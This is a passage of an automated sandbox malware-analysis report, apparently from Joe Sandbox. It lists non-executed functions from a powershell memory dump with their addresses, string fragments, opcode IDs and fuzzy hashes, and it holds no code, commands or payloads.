                          • Instruction Fuzzy Hash: 0D01A2F2B0412457CF2516A808125AE6B128BE1B15F0444BFCD029FB86DE75AD4683E7

                          Non-executed Functions

                          Function 07492208 Relevance: 12.8, Strings: 10, Instructions: 307COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000006.00000002.2488231949.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_7490000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'fq$4'fq$4'fq$4'fq$$fq$$fq$$fq$$fq$$fq$$fq
                          • API String ID: 0-1802041116
                          • Opcode ID: e182689a7ff76335a83248e81ef84834b503129145c0bb8beae0d6e162dcc4ef
                          • Instruction ID: 4d87b2e19aff5572503190b92d6f490e27eedb3cb4593d20da78b5194913fb3b
                          • Opcode Fuzzy Hash: e182689a7ff76335a83248e81ef84834b503129145c0bb8beae0d6e162dcc4ef
                          • Instruction Fuzzy Hash: 11A13AB1714216AFCF258A7998506FBBFA6BF82250F14807BD905CB391DF75C842C7A1
                          Function 0749C7D5 Relevance: 11.5, Strings: 9, Instructions: 209COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000006.00000002.2488231949.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_7490000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'fq$4'fq$d%lq$d%lq$d%lq$d%lq$tPfq$tPfq$$fq
                          • API String ID: 0-3516216882
                          • Opcode ID: f5fb8d97b185622d72bdff5f136603fa8ebce37ae11d42026e47a5dfe48d6a35
                          • Instruction ID: 550ae3793b70ad75792597817cf5f667ce353c84c97d229023d105c15779501f
                          • Opcode Fuzzy Hash: f5fb8d97b185622d72bdff5f136603fa8ebce37ae11d42026e47a5dfe48d6a35
                          • Instruction Fuzzy Hash: 5E71AEB1B102169FDF248F788491BABBFA2AB85654F14887BD8019B791DB31DC41C7B1
                          Function 0749D028 Relevance: 8.9, Strings: 7, Instructions: 196COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000006.00000002.2488231949.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_7490000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'fq$tPfq$tPfq$$fq$(lq$(lq$(lq
                          • API String ID: 0-1776576528
                          • Opcode ID: ac943571257097819d5d6770e8ba128f095ce840fa2194db8740ba876fd343c6
                          • Instruction ID: d180b5548cba073f3fe37c8d551d025bf64c8b346b3c0674fb3e3b1ed5b05488
                          • Opcode Fuzzy Hash: ac943571257097819d5d6770e8ba128f095ce840fa2194db8740ba876fd343c6
                          • Instruction Fuzzy Hash: EF616CB1F00205DFCF248E55C545AEBBBA2AF89611F19846BE805AB394C775EC81CFA1
                          Function 0749CCC4 Relevance: 8.9, Strings: 7, Instructions: 157COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000006.00000002.2488231949.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_7490000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'fq$TQkq$TQkq$tPfq$$fq$$fq$$fq
                          • API String ID: 0-1114105955
                          • Opcode ID: 2280cc9fd92477762c98cc27a5ed42b522fd56bc43bbaa1abe1160868207edd8
                          • Instruction ID: a1feb961ed2a63d2a5282a601654583eef6622eb0ca14414f8048701d72ccb99
                          • Opcode Fuzzy Hash: 2280cc9fd92477762c98cc27a5ed42b522fd56bc43bbaa1abe1160868207edd8
                          • Instruction Fuzzy Hash: 4E51ACB1600206DBCF258E24C594BEBBFA2AF45351F1884BBE8159B2D5D771DC81CBB2
                          Function 0749CCD8 Relevance: 8.9, Strings: 7, Instructions: 153COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000006.00000002.2488231949.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_7490000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'fq$TQkq$TQkq$tPfq$$fq$$fq$$fq
                          • API String ID: 0-1114105955
                          • Opcode ID: 7259a9fe02112f56f37e30c2b38b013f6ee1e36886a6c8d711ade4b7f109e0b8
                          • Instruction ID: 0289310d7522e9e0baa38bf7b42cd25735e64d737377818e0b348974fae71b19
                          • Opcode Fuzzy Hash: 7259a9fe02112f56f37e30c2b38b013f6ee1e36886a6c8d711ade4b7f109e0b8
                          • Instruction Fuzzy Hash: 5851ADB1600206DBCF248E24C584BEBBFA2AB45351F588477E8169B3D5D731DD81CBB1
                          Function 074900F0 Relevance: 8.0, Strings: 6, Instructions: 464COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000006.00000002.2488231949.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_7490000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'fq$4'fq$XY l$XY l$tPfq$tPfq
                          • API String ID: 0-4050275518
                          • Opcode ID: 60b805979f25d522968ea5c9279644f1aa93da42f2a05a7b55507d0ae159be5a
                          • Instruction ID: 7b1b18da56445375b3c25701615cc5bf0fb85e074de17437f33ed0513930dabe
                          • Opcode Fuzzy Hash: 60b805979f25d522968ea5c9279644f1aa93da42f2a05a7b55507d0ae159be5a
                          • Instruction Fuzzy Hash: D9E106B1B142179FCF258A6888556EBBFA69FC6310F24C47BD905CB3A1DA32DC41C7A1
                          Function 0749D6E0 Relevance: 6.4, Strings: 5, Instructions: 185COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000006.00000002.2488231949.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_7490000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'fq$tPfq$$fq$$fq$$fq
                          • API String ID: 0-3445244938
                          • Opcode ID: 89e6813002e9ab6fa5d58660cb55beeb922c86d186ebd76b768c9094106c57e1
                          • Instruction ID: 6ae4e0f56fc7e05664e1f39a27a6b1a5f7913e893a4b7804210f2a55abcaf220
                          • Opcode Fuzzy Hash: 89e6813002e9ab6fa5d58660cb55beeb922c86d186ebd76b768c9094106c57e1
                          • Instruction Fuzzy Hash: D76177B0F1020ADFDF249E15C544BEBBBA6AB46351F1884BBE8155B391C735E881CFA1
                          Function 07493FC5 Relevance: 6.4, Strings: 5, Instructions: 109COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000006.00000002.2488231949.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_7490000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'fq$4'fq$$fq$$fq$$fq
                          • API String ID: 0-3759051638
                          • Opcode ID: 0d21c9af7ba5ea22556c4bc8f670367fce87e64db56a8ec4feace3a37db540f5
                          • Instruction ID: 0a313cbdce2d620dd195bc1d7f3594d35259ac0fa716af4b62d9f47304a3ee54
                          • Opcode Fuzzy Hash: 0d21c9af7ba5ea22556c4bc8f670367fce87e64db56a8ec4feace3a37db540f5
                          • Instruction Fuzzy Hash: 033124B2B04286CBDF254E68C4441F7BFA6ABC2211B24847BC80587281EE36C853C751
                          Function 0749C8D6 Relevance: 6.3, Strings: 5, Instructions: 85COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000006.00000002.2488231949.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_7490000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'fq$d%lq$d%lq$d%lq$tPfq
                          • API String ID: 0-3104067135
                          • Opcode ID: e2519ff313f443153300bce9575a10692209e17d7438a27588cada2de81f80d9
                          • Instruction ID: 7839237e7204dbbb19257884c3c841e895e360373a9e91748afa64aa67eb173f
                          • Opcode Fuzzy Hash: e2519ff313f443153300bce9575a10692209e17d7438a27588cada2de81f80d9
                          • Instruction Fuzzy Hash: 8B31A2B1B00215DFDF24DF68C490AAEBFA2FB89714F14856AE805AB351D731EC41CBA1
                          Function 0749C040 Relevance: 5.5, Strings: 4, Instructions: 483COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000006.00000002.2488231949.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_7490000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: (ofq$(ofq$(ofq$(ofq
                          • API String ID: 0-875029461
                          • Opcode ID: fb0fb4c046195d25171f266a291a4ba08c7175f191557c8bbd9dbe53718c876c
                          • Instruction ID: aac32b280527129776d988137b7fde9b86b4f2d4f3b4c97251869642e6f1020f
                          • Opcode Fuzzy Hash: fb0fb4c046195d25171f266a291a4ba08c7175f191557c8bbd9dbe53718c876c
                          • Instruction Fuzzy Hash: 84F1CEB1B04205DFDF158FB8C895BEBBFA2AB86311F14847BE9058B291DB35C845CB61
                          Function 07491278 Relevance: 5.4, Strings: 4, Instructions: 419COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000006.00000002.2488231949.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_7490000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'fq$4'fq$$fq$$fq
                          • API String ID: 0-2206495126
                          • Opcode ID: b48678ba7e0c6625ed14820e32dee131138abf1492cab6dee30b577430251d7c
                          • Instruction ID: e14c37754a5d517da9a41243d40eb36bc791f98fe71dfede46ef3eeed72fe3d4
                          • Opcode Fuzzy Hash: b48678ba7e0c6625ed14820e32dee131138abf1492cab6dee30b577430251d7c
                          • Instruction Fuzzy Hash: 56F1A5B4B0020ADFDB14DB68C455A9ABBF2EF85314F15C06AE905AF755CB32DC42CB92
                          Function 074968A8 Relevance: 5.2, Strings: 4, Instructions: 192COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000006.00000002.2488231949.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_7490000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: (f l$(f l$(f l$(f l
                          • API String ID: 0-2847551951
                          • Opcode ID: 5959c448724cb648f2ee9100e0902c814b47eb79a1c4fbcb515a13e331dff3f4
                          • Instruction ID: 9572c209236ef9bb086b31bfd266c614ff747e1deeb0ffada60259582453a0a6
                          • Opcode Fuzzy Hash: 5959c448724cb648f2ee9100e0902c814b47eb79a1c4fbcb515a13e331dff3f4
                          • Instruction Fuzzy Hash: 14716EB4B00205DFDF14DF68C495AAABBB2AF8A314F15C16AD805AB715CB35DC81CB92
                          Function 0749DAA8 Relevance: 5.1, Strings: 4, Instructions: 115COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000006.00000002.2488231949.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_7490000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: XRkq$XRkq$tPfq$$fq
                          • API String ID: 0-1861106669
                          • Opcode ID: 2c1c12809e8a457d99b0738fe040d1999b765979b0fa9fcf9367c833e2009324
                          • Instruction ID: 610432b8d5de6e3c157f826a19b3930fd9c5906e388f4ff5057cb22d4ea66a06
                          • Opcode Fuzzy Hash: 2c1c12809e8a457d99b0738fe040d1999b765979b0fa9fcf9367c833e2009324
                          • Instruction Fuzzy Hash: E2415CB0F04205EBCF248E59C544AEABBE2AB49710F19C4BAD4156B394C771ED41CFA0
                          Function 074919D8 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000006.00000002.2488231949.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_7490000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: $fq$$fq$$fq$$fq
                          • API String ID: 0-2113499236
                          • Opcode ID: 021f24a7ed1a92be2a6502b607f14b48fb361eaf2f52caa0720400d65a09ed3a
                          • Instruction ID: 0b65dd2bfeffbe66f752e4b4411e590a7ae1eecd0d1158ed8e52f77f539efd48
                          • Opcode Fuzzy Hash: 021f24a7ed1a92be2a6502b607f14b48fb361eaf2f52caa0720400d65a09ed3a
                          • Instruction Fuzzy Hash: 782127B171020B6BDF34596E9801BA77E9B9BD2754F24843BA909DB381DE79CC41C361